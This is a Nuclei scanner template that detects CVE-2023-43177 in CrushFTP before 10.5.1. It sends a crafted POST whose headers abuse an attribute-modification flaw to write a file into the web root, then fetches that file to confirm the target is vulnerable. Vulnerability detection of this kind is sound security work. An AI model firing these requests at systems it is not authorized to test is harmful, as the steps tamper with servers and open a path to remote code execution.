id: CVE-2023-43177 info: name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution author: iamnoooob,rootxharsh,pdresearch severity: critical description: | CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-43177 - https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/ - https://blog.projectdiscovery.io/crushftp-rce/ - https://github.com/the-emmons/CVE-Disclosures/blob/main/Pending/CrushFTP-2023-1.md classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-43177 cwe-id: CWE-913 epss-score: 0.00106 epss-percentile: 0.42667 cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: crushftp product: crushftp tags: cve,cve2023,crushftp,unauth,rce,intrusive flow: http(1) && http(2) && http(3) variables: dirname: "{{randbase(5)}}" filename: "{{randbase(5)}}" http: - method: GET path: - "{{BaseURL}}/WebInterface" matchers: - type: dsl dsl: - contains_all(to_lower(header), "currentauth", "crushauth") - method: POST path: - "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}" headers: Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}" as2-to: X user_name: crushadmin{{dirname}} user_log_path: "./WebInterface/{{dirname}}/" user_log_file: "{{filename}}" Content-Type: application/x-www-form-urlencoded body: | post=body matchers: - type: regex regex: - "crushadmin" - method: GET path: - "{{BaseURL}}/WebInterface/{{dirname}}/{{filename}}" matchers: - type: dsl dsl: - status_code == 200 - contains(body, "crushadmin{{dirname}}") condition: and # digest: 4a0a00473045022100d913354a9c93a89ba357bc9d81307fe0e0a7f3c90860307993cbc66f5eda4e310220240033f4cf45f26955c06a3db3b76e0532cc88ee2e3a32118e5ffc09cfeefb0b:922c64590222798bb761d5b6d8e72950